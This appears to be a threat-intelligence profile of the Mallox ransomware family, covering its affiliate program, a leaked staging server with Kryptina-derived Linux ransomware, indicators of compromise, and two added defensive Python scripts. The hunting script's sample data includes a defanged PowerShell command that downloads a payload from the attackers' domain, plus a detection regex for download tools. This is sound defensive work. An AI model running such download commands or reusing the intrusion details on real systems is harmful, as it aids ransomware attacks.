Mallox
Mallox is an enterprise-focused ransomware family and ransomware-as-a-service (RaaS) operation that emerged in 2021. It is also tracked as TargetCompany, FARGO, XOLLAM, and BOZON, although Mallox is the most widely used name. The operation reportedly began as a private group and launched an affiliate program in 2022. Recruitment was selective: the program sought Russian-speaking affiliates, excluded English speakers and novices, and instructed affiliates to target organizations with at least $10 million in revenue while avoiding hospitals and educational institutions. Reporting cited here puts the program at 16 active affiliates in 2023, with eight of those original affiliates still active in 2024 and no newcomers.
The family is associated with enterprise intrusions and big-game-hunting targeting. Mallox operators are reported to exploit recently disclosed vulnerabilities, including Microsoft SQL Server flaws, and to use brute-force attacks for initial access; insecure Microsoft SQL servers are a recurring entry point in reporting on the family. Separate reporting describes WeaXor (also written Weaxor) as a modified version or rebrand of Mallox.
A May 2024 leak from a Mallox affiliate staging server gave detailed insight into one affiliate's tooling. That affiliate's Linux ransomware, branded "Mallox v1.0," was built from a modified copy of the open-source Kryptina Linux RaaS platform. It retained Kryptina's core encryption and decryption routines, source layout, web interface, and builder components; most changes were rebranding, translated documentation, and minor edits. The Linux variant encrypts files with AES-256-CBC through the OpenSSL API in the retained krptna_process_file() routine, and keeps Kryptina's XOR-plus-base64 encoding of keys and configuration data. That encoding is obfuscation rather than protection: anyone holding the sample and its XOR key can recover the embedded values. The builder accepted the parameters demo, debug, symbols, arch32, xor, jobs, persist, maxsize, and secdel; secdel enabled a secure-deletion, wiper-like capability.
The leaked affiliate server was hosted at 185[.]73.125[.]6 and contained the modified Kryptina source, a web interface, builder infrastructure, ransom note templates, and target-specific output folders. Fourteen victim/output subfolders were present, seven of which held a config.json plus compiled encryptor and decryptor binaries. All seven configured builds shared the same values: the Bitcoin address 18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3, the encrypted-file extension .lmallox, the key smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4= (44 base64 characters, which decode to 32 bytes, the size of an AES-256 key), and a ransom amount of 500.0. The ransom note configuration carried the Tox ID 290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697. Because these values are constant across builds, the address, extension and Tox ID identify this affiliate's output regardless of victim and are the most reliable pivots from this leak.
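The obfuscation layering described for the Kryptina-derived builder and the shared config values above lend themselves to a small triage script. The following is an added example written for this page, not Kryptina or Mallox code: it reproduces the XOR-then-base64 encoding style with an assumed repeating key (the builder's real key is not on this page) and checks that the leaked key string, Tox ID and Bitcoin address are well formed. The config.json field names are assumptions, and the config itself is constructed from the values quoted above.

```python
import base64
import hashlib
import json

# Assumed key for the demonstration only; the real Kryptina XOR key is not on this page.
DEMO_XOR_KEY = b"kryptina-demo"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def obfuscate(plaintext: bytes, key: bytes = DEMO_XOR_KEY) -> str:
    """XOR, then base64: the layering the leak describes for keys and config."""
    return base64.b64encode(xor_bytes(plaintext, key)).decode("ascii")


def deobfuscate(blob: str, key: bytes = DEMO_XOR_KEY) -> bytes:
    """Reverse of obfuscate(); this is all an analyst with the key needs."""
    return xor_bytes(base64.b64decode(blob), key)


def decode_aes256_key(key_b64: str) -> bytes:
    """A base64 AES-256 key must decode to exactly 32 bytes."""
    raw = base64.b64decode(key_b64, validate=True)
    if len(raw) != 32:
        raise ValueError(f"expected a 32-byte key, got {len(raw)} bytes")
    return raw


def tox_id_is_valid(tox_id: str) -> bool:
    """Tox ID = 32-byte public key + 4-byte nospam + 2-byte checksum, 76 hex chars.
    The checksum is the XOR of the first 36 bytes folded into two bytes."""
    if len(tox_id) != 76:
        return False
    try:
        raw = bytes.fromhex(tox_id)
    except ValueError:
        return False
    check = [0, 0]
    for i, b in enumerate(raw[:36]):
        check[i % 2] ^= b
    return bytes(check) == raw[36:]


_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def btc_address_is_valid(addr: str) -> bool:
    """Base58Check for legacy addresses: 25 bytes whose last 4 are the start of
    SHA-256(SHA-256(first 21 bytes)).  Catches transcription errors in IOC lists."""
    n = 0
    for ch in addr:
        if ch not in _B58:
            return False
        n = n * 58 + _B58.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    body = b"\x00" * (len(addr) - len(addr.lstrip("1"))) + body  # each leading '1' is a 0x00 byte
    if len(body) != 25:
        return False
    digest = hashlib.sha256(hashlib.sha256(body[:21]).digest()).digest()
    return digest[:4] == body[21:]


# Constructed config.json (field names assumed) carrying the values shared by
# the seven configured builds on the leaked server.
SAMPLE_CONFIG = json.dumps({
    "btc": "18CUq89XR81Y7Ju2UBjER14fYWTfVwpGP3",
    "ext": ".lmallox",
    "key": "smHKnqN7S1ehBz4zxya6ddwys39PJHbF7LlqIS1+Fq4=",
    "ransom": 500.0,
    "tox": "290E6890D02FBDCD92659056F9A95D80854534A4D76EE5D3A64AFD55E584EA398722EC2D3697",
})


def triage_config(config_text: str) -> dict:
    """Pull the pivot fields out of a config and report whether each is well formed."""
    cfg = json.loads(config_text)
    return {
        "btc": cfg["btc"],
        "btc_valid": btc_address_is_valid(cfg["btc"]),
        "extension": cfg["ext"],
        "key_bytes": len(decode_aes256_key(cfg["key"])),
        "ransom": cfg["ransom"],
        "tox_valid": tox_id_is_valid(cfg["tox"]),
    }


if __name__ == "__main__":
    blob = obfuscate(SAMPLE_CONFIG.encode())
    assert deobfuscate(blob).decode() == SAMPLE_CONFIG
    print(json.dumps(triage_config(SAMPLE_CONFIG), indent=2))
```

The round trip makes the security point concrete: the base64 layer hides nothing from a decoder, and the XOR key is a constant in the binary, so the "obfuscated" AES key is recoverable by anyone who has the sample. The format checks are cheap insurance when copying indicators between reports; a Tox ID or Bitcoin address that fails its checksum was mangled somewhere along the way.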
The same server also hosted broader intrusion tooling: Windows-focused droppers, a legitimate Kaspersky password reset utility, and exploit code for CVE-2024-21338, covering payload delivery, beachhead establishment, and privilege escalation. Artifacts named in the leak reporting: Application.jar (SHA1 5cf67c0a1fa06101232437bee5111fefcd8e2df4), which launched PowerShell to download a Mallox payload saved as id.exe (SHA1 0f1aea2cf0c9f2de55d2b920618a5948c5e5e119); KLAPR.ZIP / KLAPR.BAT (SHA1 43377911601247920dc15e9b22eda4c57cb9e743), identified as Kaspersky Lab AllProducts Password Reset v2.0; jre-8u401-windows-x64.exe (SHA1 dc3f98dded6c1f1e363db6752c512e01ac9433f3); Reader.lnk (SHA1 c20e8d536804cf97584eec93d9a89c09541155bc); and Java bytecode referencing grovik71.theweb[.]place. The x64 payload red.exe carried the same SHA1 as id.exe, 0f1aea2cf0c9f2de55d2b920618a5948c5e5e119, and was identical to id.exe and MSiedge.exe on the same server, so a single hash match covers all three filenames.
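The dropper chain above (a Java archive launching PowerShell that fetches the payload) and the SHA-1 list translate directly into a hunting query. The following is an added example written for this page, not a vendor rule: it scores process-creation events for Java-spawned PowerShell carrying download arguments and matches file hashes against the leaked artifacts. The events are constructed to resemble Sysmon Event ID 1 records with assumed field names; the download URL in the first sample is an assumption that combines the id.exe download with the grovik71.theweb[.]place reference, not a command line quoted in the leak.

```python
import re
from dataclasses import dataclass

# SHA-1 values quoted in the leak reporting above, keyed to the role of each file.
MALLOX_SHA1 = {
    "5cf67c0a1fa06101232437bee5111fefcd8e2df4": "Application.jar (dropper)",
    "0f1aea2cf0c9f2de55d2b920618a5948c5e5e119": "id.exe / red.exe / MSiedge.exe (x64 payload)",
    "43377911601247920dc15e9b22eda4c57cb9e743": "KLAPR.BAT (Kaspersky password reset)",
    "dc3f98dded6c1f1e363db6752c512e01ac9433f3": "jre-8u401-windows-x64.exe",
    "c20e8d536804cf97584eec93d9a89c09541155bc": "Reader.lnk",
}

JAVA_IMAGES = {"java.exe", "javaw.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives and encoded-command flags.
DOWNLOAD_RE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|net\.webclient|"
    r"start-bitstransfer|\bcurl\b|\bwget\b|-enc(odedcommand)?\b",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon EID 1 shape; field names assumed)."""
    image: str
    parent_image: str
    command_line: str
    sha1: str = ""


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(ev: ProcEvent) -> list[str]:
    """Return the reasons an event is suspicious; an empty list means nothing fired."""
    reasons = []
    parent, image = _basename(ev.parent_image), _basename(ev.image)
    if parent in JAVA_IMAGES and image in POWERSHELL_IMAGES:
        reasons.append("PowerShell launched by a Java runtime")
        if DOWNLOAD_RE.search(ev.command_line):
            reasons.append("download primitive in PowerShell command line")
    role = MALLOX_SHA1.get(ev.sha1.lower())
    if role:
        reasons.append(f"SHA-1 matches leaked artifact: {role}")
    return reasons


def hunt(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Run assess() over a batch and keep only the events that fired."""
    hits = []
    for ev in events:
        reasons = assess(ev)
        if reasons:
            hits.append((ev.image, reasons))
    return hits


# Constructed sample events, not real telemetry.  The defanged URL is an
# assumption: the leak names the domain but does not quote this command line.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Program Files\Java\jre1.8.0_401\bin\javaw.exe",
        command_line=(
            "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
            "'hxxp://grovik71.theweb[.]place/id.exe','C:\\Users\\Public\\id.exe')\""
        ),
    ),
    ProcEvent(
        image=r"C:\Users\Public\id.exe",
        parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="id.exe",
        sha1="0F1AEA2CF0C9F2DE55D2B920618A5948C5E5E119",
    ),
    ProcEvent(  # benign: an administrator's interactive PowerShell
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        parent_image=r"C:\Windows\explorer.exe",
        command_line="powershell Get-Process",
    ),
]


if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The parent-child rule is the durable part: hashes change with every rebuild (the leak itself shows one payload under three names), whereas a Java runtime spawning PowerShell with a download primitive is rare in most fleets and survives re-packing. Hash matching is kept as a second, high-confidence signal for the specific artifacts in this leak.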
Mallox also appears in broader ransomware reporting, including 2023 industrial-sector tracking, and later reporting describes WeaXor as a Mallox-derived or Mallox-rebranded strain. Taken together, the material characterizes Mallox as a longstanding, enterprise-oriented ransomware family with affiliate-driven operations, known SQL-server-related intrusion activity, and at least one Linux branch derived from Kryptina.
Vulnerabilities exploited
2 CVEs correlated with this family across public research and vendor advisories.
The leaked affiliate server included exploit code for CVE-2024-21338, a local privilege escalation flaw in Windows 10 and 11 with HVCI (Hypervisor-Protected Code Integrity) enabled; the exploit is based on proof-of-concept code from a Hakai Security writeup. Mallox (aka TargetCompany) is a longstanding, enterprise-focused RaaS that emerged in 2021; the alternative names FARGO, XOLLAM, and BOZON come from the extension appended to encrypted files in some variants.
Groups observed using it
1 distinct threat actor attributed by public researchers.
Techniques & procedures
14 distinct techniques documented for this family, organized by ATT&CK tactic:
Initial Access: 2 techniques
Execution: 2 techniques
Persistence: 2 techniques
Privilege Escalation: 2 techniques
Stealth: 2 techniques
Credential Access: 1 technique
Discovery: 2 techniques
Command and Control: 1 technique
Impact: 1 technique
IOCs tracked for this family
35 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, comprising IPs, domains, and DNS infrastructure linked to this family, and file hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
8 sources tracked across advisories, community write-ups, and news, including:
A ransomware family affiliated with an actor whose staging server leak exposed adaptations of Kryptina for enterprise attacks.
A ransomware variant first reported in 2021 that launched an affiliate program in 2022. It follows a big-game-hunting model with affiliate IDs, a Tor-hosted leak site, and targeting guidance focused on organizations with at least $10 million in revenue while excluding hospitals and educational institutions.
A ransomware family listed among malware observed in or associated with React2Shell exploitation activity; the source gives no further campaign detail.
A ransomware family named in a malware list; the source gives no further detail.